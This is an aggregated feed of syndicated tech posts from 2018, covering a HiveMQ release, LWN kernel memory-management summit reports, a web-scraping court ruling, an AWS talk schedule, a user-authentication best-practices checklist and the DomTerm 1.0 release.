Due to the distributed nature of a HiveMQ, data needs to be replicated across the cluster in certain events, e.g. when cluster topology changes occur. There are various internal improvements in HiveMQ version 3.4, which increase the replication performance significantly. Our engineers put special love into the replication of Queued Messages, which is now faster than ever, even for multiple millions of Queued Messages that need to be transferred across the cluster.

Updated Native SSL Libraries

The Native SSL Integration of HiveMQ was updated to the newest BoringSSL version. This results in better performance and increased security. In case you’re using SSL and you are not yet using the native SSL integration, we strongly recommend to give it a try, more than 40% performance improvement can be observed for most deployments.

 
 

Improvements for Java 9

While Java 9 was already supported for older HiveMQ versions, HiveMQ 3.4 has full-blown Java 9 support. The minimum Java version still remains Java 7, although we strongly recommend to use Java 8 or newer for the best performance of HiveMQ.

[$] Hotplugging and poisoning

Post Syndicated from corbet original https://lwn.net/Articles/753261/rss

Memory hotplugging is one of the least-loved areas of the memory-management
subsystem; there are many use cases for it, but nobody has taken ownership
of it. A similar situation exists for hardware page
poisoning, a somewhat neglected mechanism for dealing with memory errors.
At the 2018 Linux Storage, Filesystem, and Memory-Management summit, Michal
Hocko and Mike Kravetz dedicated a pair of brief memory-management track
sessions to problems that have been encountered in these subsystems, one of
which seems more likely to get the attention it needs than the other.

[$] Zone-lock and mmap_sem scalability

Post Syndicated from corbet original https://lwn.net/Articles/753269/rss

The memory-management subsystem is a central point that handles all of the
system’s memory, so it is naturally subject to scalability problems as
systems grow larger. Two sessions during the memory-management track of
the 2018 Linux Storage, Filesystem, and Memory-Management Summit looked at
specific contention points: the zone locks and the mmap_sem
semaphore.

[$] Improving support for large, contiguous allocations

Post Syndicated from corbet original https://lwn.net/Articles/753167/rss

Allocating chunks of memory that are both large and physically contiguous
has long been a difficult thing to do in the kernel. But there are times where
there is no alternative. Two sessions in the memory-management track of
the 2018 Linux Storage, Filesystem, and Memory-Management Summit explored
ways of making those allocations more reliable. It turns out that some use
cases have a rather larger value of “large” than others.

[$] Three sessions on memory control groups

Post Syndicated from corbet original https://lwn.net/Articles/753162/rss

Memory control groups allow the system administrator to impose memory-use
limits on the members of control groups. In many ways, these limits behave
like the overall limit on available memory, but there are also some
differences. The behavior of the memory controller also changed with the
advent of the version-2 control-group API, creating problems for at least
one significant user. Three sessions held in the memory-management track of
the Linux Storage, Filesystem, and Memory-Management Summit explored some
of these problems.

[$] The slab and protected-memory allocators

Post Syndicated from corbet original https://lwn.net/Articles/753154/rss

One of the core jobs of the memory-management subsystem is to make memory
available to other parts of the kernel when the need arises. The
memory-management track of the 2018 Linux Storage, Filesystem, and
Memory-Management Summit hosted a pair of sessions on new or improved
allocation functions for the kernel covering the slab allocators and
protectable memory.

[$] The LRU lock and mmap_sem

Post Syndicated from corbet original https://lwn.net/Articles/753058/rss

The kernel’s memory-management subsystem has to manage a great deal of
concurrency; that leads to an ongoing series of locking challenges that
sometimes seem intractable. Two recurring locking issues — the LRU locks
and the mmap_sem lock — were the topic of sessions held during the
memory-management track of the 2018 Linux Storage, Filesystem, and
Memory-Management Summit. In both cases, it quickly became clear that,
while some interesting ideas are being pursued, easy
solutions are not on offer.

[$] Heterogeneous memory management and MMU notifiers

Post Syndicated from corbet original https://lwn.net/Articles/752964/rss

Heterogeneous memory management (HMM) is a relatively new kernel subsystem
that allows the system to manage peripherals (such as graphics processors)
that have their own memory-management units. In two sessions during the
memory-management track of the 2018 Linux Storage,
Filesystem, and Memory-Management Summit, HMM creator Jérôme Glisse
provided an update on the status of this subsystem and where it is going,
along with a more detailed look at the memory-management unit (MMU)
notifiers mechanism on which it depends.

[$] Repurposing page->mapping

Post Syndicated from corbet original https://lwn.net/Articles/752564/rss

The page structure is one of the
most complex in the kernel due to the need to cram the maximum amount of
information into as little space as possible. Each field is so heavily
overloaded that developers prefer to avoid making changes to struct
page
if they can avoid
it. That didn’t deter Jérôme Glisse from proposing a significant change
during two plenary sessions at
the 2018 Linux Storage, Filesystem, and Memory-Management Summit, though.
There are some interesting benefits on offer, but getting there will not be
a simple task.

Извличане на данни (web scraping)

Post Syndicated from nellyo original https://nellyo.wordpress.com/2018/04/14/web-scraping/

Според съд в DC използването на автоматизирани инструменти (“web scrapers”) за достъп до публично достъпна информация   не е компютърно престъпление. Делото е Sandvig v. Sessions.

Изследователи, компютърни специалисти и журналисти  искат да използват автоматизирани инструменти за достъп до данни онлайн. Според някои тълкувания 1986 Computer Fraud and Abuse Act (CFAA) забранява това. Така се стига до  произнасяне на съда, FCC съобщава:

Първата поправка на Конституцията защитава не само правото на изказване, но и правото на получаване на информация.  Фактът, че “ищецът желае да получава по автоматизиран път данни от уеб сайтове, а не да записва ръчно информация, не променя заключението”. Използването на автоматизирани инструменти е просто технологичен напредък, който прави събирането на информация по-лесно. То не е по същество различно от използването на средства за звукозапис, вместо да се правят писмени бележки или  от използването на  панорамна функция на смартфон, вместо да се правят серии от снимки от различни позиции, смята съдът.

Това е второто произнасяне – отново в същия смисъл, преди това съдът заключава, че “широкото тълкуване на CFАA,  ако бъде прието, би могло да има дълбок ефект върху отворения достъп до интернет, което Конгресът не би могъл да възнамерява, когато е приел закона преди три десетилетия.”

Миналата седмица широко се обсъждаше  нивото на технологична експертиза на сенаторите в САЩ, но и на съдиите не им е лесно – като гледам как прибягват до сравнения с по-познати неща. Още преди години това правеше силно впечатление.

AWS Online Tech Talks – April & Early May 2018

Post Syndicated from Betsy Chernoff original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-april-early-may-2018/

We have several upcoming tech talks in the month of April and early May. Come join us to learn about AWS services and solution offerings. We’ll have AWS experts online to help answer questions in real-time. Sign up now to learn more, we look forward to seeing you.

Note – All sessions are free and in Pacific Time.

April & early May — 2018 Schedule

Compute

April 30, 2018 | 01:00 PM – 01:45 PM PTBest Practices for Running Amazon EC2 Spot Instances with Amazon EMR (300) – Learn about the best practices for scaling big data workloads as well as process, store, and analyze big data securely and cost effectively with Amazon EMR and Amazon EC2 Spot Instances.

May 1, 2018 | 01:00 PM – 01:45 PM PTHow to Bring Microsoft Apps to AWS (300) – Learn more about how to save significant money by bringing your Microsoft workloads to AWS.

May 2, 2018 | 01:00 PM – 01:45 PM PTDeep Dive on Amazon EC2 Accelerated Computing (300) – Get a technical deep dive on how AWS’ GPU and FGPA-based compute services can help you to optimize and accelerate your ML/DL and HPC workloads in the cloud.

Containers

April 23, 2018 | 11:00 AM – 11:45 AM PTNew Features for Building Powerful Containerized Microservices on AWS (300) – Learn about how this new feature works and how you can start using it to build and run modern, containerized applications on AWS.

Databases

April 23, 2018 | 01:00 PM – 01:45 PM PTElastiCache: Deep Dive Best Practices and Usage Patterns (200) – Learn about Redis-compatible in-memory data store and cache with Amazon ElastiCache.

April 25, 2018 | 01:00 PM – 01:45 PM PTIntro to Open Source Databases on AWS (200) – Learn how to tap the benefits of open source databases on AWS without the administrative hassle.

DevOps

April 25, 2018 | 09:00 AM – 09:45 AM PTDebug your Container and Serverless Applications with AWS X-Ray in 5 Minutes (300) – Learn how AWS X-Ray makes debugging your Container and Serverless applications fun.

Enterprise & Hybrid

April 23, 2018 | 09:00 AM – 09:45 AM PTAn Overview of Best Practices of Large-Scale Migrations (300) – Learn about the tools and best practices on how to migrate to AWS at scale.

April 24, 2018 | 11:00 AM – 11:45 AM PTDeploy your Desktops and Apps on AWS (300) – Learn how to deploy your desktops and apps on AWS with Amazon WorkSpaces and Amazon AppStream 2.0

IoT

May 2, 2018 | 11:00 AM – 11:45 AM PTHow to Easily and Securely Connect Devices to AWS IoT (200) – Learn how to easily and securely connect devices to the cloud and reliably scale to billions of devices and trillions of messages with AWS IoT.

Machine Learning

April 24, 2018 | 09:00 AM – 09:45 AM PT Automate for Efficiency with Amazon Transcribe and Amazon Translate (200) – Learn how you can increase the efficiency and reach your operations with Amazon Translate and Amazon Transcribe.

April 26, 2018 | 09:00 AM – 09:45 AM PT Perform Machine Learning at the IoT Edge using AWS Greengrass and Amazon Sagemaker (200) – Learn more about developing machine learning applications for the IoT edge.

Mobile

April 30, 2018 | 11:00 AM – 11:45 AM PTOffline GraphQL Apps with AWS AppSync (300) – Come learn how to enable real-time and offline data in your applications with GraphQL using AWS AppSync.

Networking

May 2, 2018 | 09:00 AM – 09:45 AM PT Taking Serverless to the Edge (300) – Learn how to run your code closer to your end users in a serverless fashion. Also, David Von Lehman from Aerobatic will discuss how they used [email protected] to reduce latency and cloud costs for their customer’s websites.

Security, Identity & Compliance

April 30, 2018 | 09:00 AM – 09:45 AM PTAmazon GuardDuty – Let’s Attack My Account! (300) – Amazon GuardDuty Test Drive – Practical steps on generating test findings.

May 3, 2018 | 09:00 AM – 09:45 AM PTProtect Your Game Servers from DDoS Attacks (200) – Learn how to use the new AWS Shield Advanced for EC2 to protect your internet-facing game servers against network layer DDoS attacks and application layer attacks of all kinds.

Serverless

April 24, 2018 | 01:00 PM – 01:45 PM PTTips and Tricks for Building and Deploying Serverless Apps In Minutes (200) – Learn how to build and deploy apps in minutes.

Storage

May 1, 2018 | 11:00 AM – 11:45 AM PTBuilding Data Lakes That Cost Less and Deliver Results Faster (300) – Learn how Amazon S3 Select And Amazon Glacier Select increase application performance by up to 400% and reduce total cost of ownership by extending your data lake into cost-effective archive storage.

May 3, 2018 | 11:00 AM – 11:45 AM PTIntegrating On-Premises Vendors with AWS for Backup (300) – Learn how to work with AWS and technology partners to build backup & restore solutions for your on-premises, hybrid, and cloud native environments.

User Authentication Best Practices Checklist

Post Syndicated from Bozho original https://techblog.bozho.net/user-authentication-best-practices-checklist/

User authentication is the functionality that every web application shared. We should have perfected that a long time ago, having implemented it so many times. And yet there are so many mistakes made all the time.

Part of the reason for that is that the list of things that can go wrong is long. You can store passwords incorrectly, you can have a vulnerably password reset functionality, you can expose your session to a CSRF attack, your session can be hijacked, etc. So I’ll try to compile a list of best practices regarding user authentication. OWASP top 10 is always something you should read, every year. But that might not be enough.

So, let’s start. I’ll try to be concise, but I’ll include as much of the related pitfalls as I can cover – e.g. what could go wrong with the user session after they login:

  • Store passwords with bcrypt/scrypt/PBKDF2. No MD5 or SHA, as they are not good for password storing. Long salt (per user) is mandatory (the aforementioned algorithms have it built in). If you don’t and someone gets hold of your database, they’ll be able to extract the passwords of all your users. And then try these passwords on other websites.
  • Use HTTPS. Period. (Otherwise user credentials can leak through unprotected networks). Force HTTPS if user opens a plain-text version.
  • Mark cookies as secure. Makes cookie theft harder.
  • Use CSRF protection (e.g. CSRF one-time tokens that are verified with each request). Frameworks have such functionality built-in.
  • Disallow framing (X-Frame-Options: DENY). Otherwise your website may be included in another website in a hidden iframe and “abused” through javascript.
  • Have a same-origin policy
  • Logout – let your users logout by deleting all cookies and invalidating the session. This makes usage of shared computers safer (yes, users should ideally use private browsing sessions, but not all of them are that savvy)
  • Session expiry – don’t have forever-lasting sessions. If the user closes your website, their session should expire after a while. “A while” may still be a big number depending on the service provided. For ajax-heavy website you can have regular ajax-polling that keeps the session alive while the page stays open.
  • Remember me – implementing “remember me” (on this machine) functionality is actually hard due to the risks of a stolen persistent cookie. Spring-security uses this approach, which I think should be followed if you wish to implement more persistent logins.
  • Forgotten password flow – the forgotten password flow should rely on sending a one-time (or expiring) link to the user and asking for a new password when it’s opened. 0Auth explain it in this post and Postmark gives some best pracitces. How the link is formed is a separate discussion and there are several approaches. Store a password-reset token in the user profile table and then send it as parameter in the link. Or do not store anything in the database, but send a few params: userId:expiresTimestamp:hmac(userId+expiresTimestamp). That way you have expiring links (rather than one-time links). The HMAC relies on a secret key, so the links can’t be spoofed. It seems there’s no consensus, as the OWASP guide has a bit different approach
  • One-time login links – this is an option used by Slack, which sends one-time login links instead of asking users for passwords. It relies on the fact that your email is well guarded and you have access to it all the time. If your service is not accessed to often, you can have that approach instead of (rather than in addition to) passwords.
  • Limit login attempts – brute-force through a web UI should not be possible; therefore you should block login attempts if they become too many. One approach is to just block them based on IP. The other one is to block them based on account attempted. (Spring example here). Which one is better – I don’t know. Both can actually be combined. Instead of fully blocking the attempts, you may add a captcha after, say, the 5th attempt. But don’t add the captcha for the first attempt – it is bad user experience.
  • Don’t leak information through error messages – you shouldn’t allow attackers to figure out if an email is registered or not. If an email is not found, upon login report just “Incorrect credentials”. On passwords reset, it may be something like “If your email is registered, you should have received a password reset email”. This is often at odds with usability – people don’t often remember the email they used to register, and the ability to check a number of them before getting in might be important. So this rule is not absolute, though it’s desirable, especially for more critical systems.
  • Make sure you use JWT only if it’s really necessary and be careful of the pitfalls.
  • Consider using a 3rd party authentication – OpenID Connect, OAuth by Google/Facebook/Twitter (but be careful with OAuth flaws as well). There’s an associated risk with relying on a 3rd party identity provider, and you still have to manage cookies, logout, etc., but some of the authentication aspects are simplified.
  • For high-risk or sensitive applications use 2-factor authentication. There’s a caveat with Google Authenticator though – if you lose your phone, you lose your accounts (unless there’s a manual process to restore it). That’s why Authy seems like a good solution for storing 2FA keys.

I’m sure I’m missing something. And you see it’s complicated. Sadly we’re still at the point where the most common functionality – authenticating users – is so tricky and cumbersome, that you almost always get at least some of it wrong.

The post User Authentication Best Practices Checklist appeared first on Bozho's tech blog.

DomTerm 1.0 released

Post Syndicated from ris original https://lwn.net/Articles/750319/rss

Per Bothner has released DomTerm 1.0. Since DomTerm was covered
here
in January 2016, many features have been added or enhanced. (See
this article
on opensource.com.)
DomTerm is a mostly-xterm-compatible terminal emulator, but the output can
be graphics, rich text, and other html, so it is suitable as a REPL for a
program like gnuplot.
Other major features include screen/tmux-style tiling and detachable
sessions, readline-style input editing (integrated with mouse and
clipboard), and opening an editor when clicking an error message.